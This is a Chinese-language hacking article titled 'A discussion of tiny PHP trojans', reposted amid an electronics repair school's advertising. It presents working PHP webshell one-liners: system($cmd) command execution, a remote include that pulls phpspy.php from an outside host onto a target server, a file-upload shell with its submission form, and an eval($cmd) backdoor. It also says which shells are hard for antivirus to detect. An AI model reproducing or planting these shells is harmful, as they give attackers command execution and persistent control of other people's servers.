家电维修班,手机维修班,电脑维修班,电工班,焊工班,液晶电视维修班,电动工具维修班、电动车摩托车维修班、网络营销培训、网站设计培训、淘宝培训---全国招生 家电维修班,手机维修班,电脑维修班,电工班,焊工班,液晶电视维修班,电动工具维修班、电动车摩托车维修班、网络营销培训、网站设计培训、淘宝培训---全国招生
阳光电影院· 地区招生平台· 知识库 · 维修资料查询 ·您想咨询招生情况,请联系我啊·您想咨询招生情况,请联系我啊·
当前位置:湖南阳光电子技术学校文章资讯招生解答

湖南阳光电子技术学校 简介

学校地址:湖南省 长沙市 雨花区 车站南路红花坡路口
来校路线:长沙火车站售票厅后坪,乘135路公交车到“红花坡站”,即到.
学校电话:0731-85579057,0731-85569651
免费电话:0731-85579057
值班手机:(0)13807313137 杨老师
开课时间:我校常年面向全国招生,月月开班。每月1号,16号开学。
招生范围:凡年满15岁的公民,不限年龄,性别,地区。都欢迎来我校学习。
食宿问题:学校免费住宿,免费提供床上用品。食堂就餐,费用自理,约12元/天。
学校官网:www.hnygpx.net www.410014.com
专业介绍:欢迎查看我校专业课程!
收费标准:欢迎查看我校收费标准!
在线 Q Q:您想咨询招生情况,请联系我啊·您想咨询招生情况,请联系我啊
网上报名:欢迎您报读湖南阳光电子学校!


微型PHP木马的探讨

减小字体 增大字体 作者:佚名  来源:本站整理  发布时间:2010-07-19 02:03:03
本文没有什么特别之处,仅求抛砖引玉。并送给和我一样菜的在PHP门边徘徊的朋友。
刚学PHP没几天,我就急于功成,所以有错误及不足之处请大家积极指出。
PHP语法的强大是ASP望尘莫及的,仅一个:<? phpinfo();?>就可以刺探整个服务器的配置。运行cmd,上传文件等,都是非常简便的,现在用的好的PHP木马,莫过于angel的phpspy了。昨天hak_ban问怎么给PHP木马加密,我还没想到,但是对于写一个微型PHP木马,我想还是很难被杀的。
这里简单探讨一下几个函数可以作为木马的使用:
1. 可以运行外部命令的几个函数:system,passthru,exec,shell_exec,popen。
例:只要将<?system($cmd);?>等保存为cmd.php及可实现运行外部命令的功能。这几个函数可以说是最早的微行php木马了,所以一般虚拟主机的设置也会将这些函数屏蔽的。
2.还记得WDB论坛的style.php的漏洞吗?我们可以利用这个做个很难被杀的小木马。如下:
<?php include($include);?>
将其保存为1.php ,我们就可以调用其他不支持php服务器里的.php木马(如phpspy.php)来达到我们的目的:http://target.com/1.php? Include=http://www.918x.com/phpspy.php
这里http://www.918x.com是不支持php的,否则将会在http://www.918x.com这台服务器运行phpspy.php,而不是目标服务器。
3. 这个还是angel在Discuz 2.2F的攻击中给我们的一个非常好的上传木马,我没有改:
<?copy($_FILES[MyFile][tmp_name],$_FILES[MyFile][name]);?>
将其保存为up.php后,在本地提交表单:
<form ENCTYPE="multipart/form-data" ACTION="http://目标服务器/up.php" METHOD="POST">
<input NAME="MyFile" TYPE="file">
<input VALUE=" 提交 " TYPE="submit">
</form>
就可以把大个的php木马上传上去。
4. 我一直在想有没有同冰狐浪子的那个ASP一句话木马一样通过本地表单提交运行的PHP木马。终于找到了函数:eval,在PHP4中文参考手册上它的语法说明:
语法: void eval(string code_str);
内容说明:本函数可将字符串之中的变量值代入,通常用在处理数据库的资料上。参数 code_str 为欲处理的字符串。值的注意的是待处理的字符串要符合 PHP 的字符串格式,同时在结尾处要有分号。使用本函数处理后的字符串会沿续到 PHP 程序结束。
我们可以在目标主机上保存:<?eval($cmd);?>为一个PHP文件(我想也可以插在PHP任意文件里)。然后通过本地提交来达到目的,但与ASP不同的是,在magic_quotes_gpc = on的时候,过滤的很多的字符,使得这个使用功能大大的缩小。
对于这个PHP木马本地表单我做了很多次,还没有成熟的代码。还请高手指教。写好后会奉献给大家的。但是eval这个函数可以做微型PHP木马是无须质疑的。
Ps:写完后,有人告诉我,其实高手早就有微型的PHP木马了,只是没有公开。哎,我好郁闷啊,研究的都是人家早就有了的成果。不管怎么样,和大家分享一下我的研究,希望能得到帮助和指教。
  湖南省阳光电子技术学校常年开设:手机维修培训、家电维修培训、电工培训、电脑维修培训、焊工培训--面向全国火爆招生!网址:http://www.hnygpx.com 报名电话:0731-85579057)。百分百安置就业。颁发全国通用权威证书。采用我校多年来独创的“模块教学法”,理论与实践相结合、原理+图纸+机器三位一体的教学模式,半天理论,半天实践,通俗易懂,确保无任何基础者也能全面掌握维修技能、成为同行业中的佼佼者。包教包会包工作(一期不会,免费学会为止)。

Tags:微型PHP木马的探讨

作者:微型PHP木马的探讨
以上是微型PHP木马的探讨详细信息,如果您想进一步的了解微型PHP木马的探讨的其他相关等,请参考下方我们为您提供的有关微型PHP木马的探讨的相关资讯,让您获取更多的微型PHP木马的探讨信息。以上微型PHP木马的探讨信息,由湖南阳光电子技术学校提供。

文章评论评论内容只代表网友观点,与本站立场无关!

   评论摘要(共 0 条,得分 0 分,平均 0 分) 查看完整评论

相关文章

网页说明

    微型PHP木马的探讨这条信息,为您提供了中国最新最全的微型PHP木马的探讨信息,欢迎您免费查看微型PHP木马的探讨信息。如果您对微型PHP木马的探讨这条消息有好的意见建议请联系我们,让我们一起进步!
  • 热门关键词:创维(766)  CPU(363)  维修(198)  彩电(188)  机芯(144)  故障(143)  招生(110)  职业中专(105)  技工学校(104)  电脑(98)  开县(91)  学校(88)  手机(87)  BIOS(68)  首选(65)  培训(65)  Windows(63)  笔记本(60)  云阳(58)  Vista(52)  学主板维修哪里最好(50)  学电脑硬件哪里最好(50)  检修(50)  Linux(46)  win7(43)  MTK(43)  海尔(42)  TCL(42)  XP(40)  东芝(40)  主板(39)  三极管(38)  模式(37)  三星(36)  硬盘(36)  液晶电视(35)  工厂(33)  技术(32)  CRT(31)  北京(30)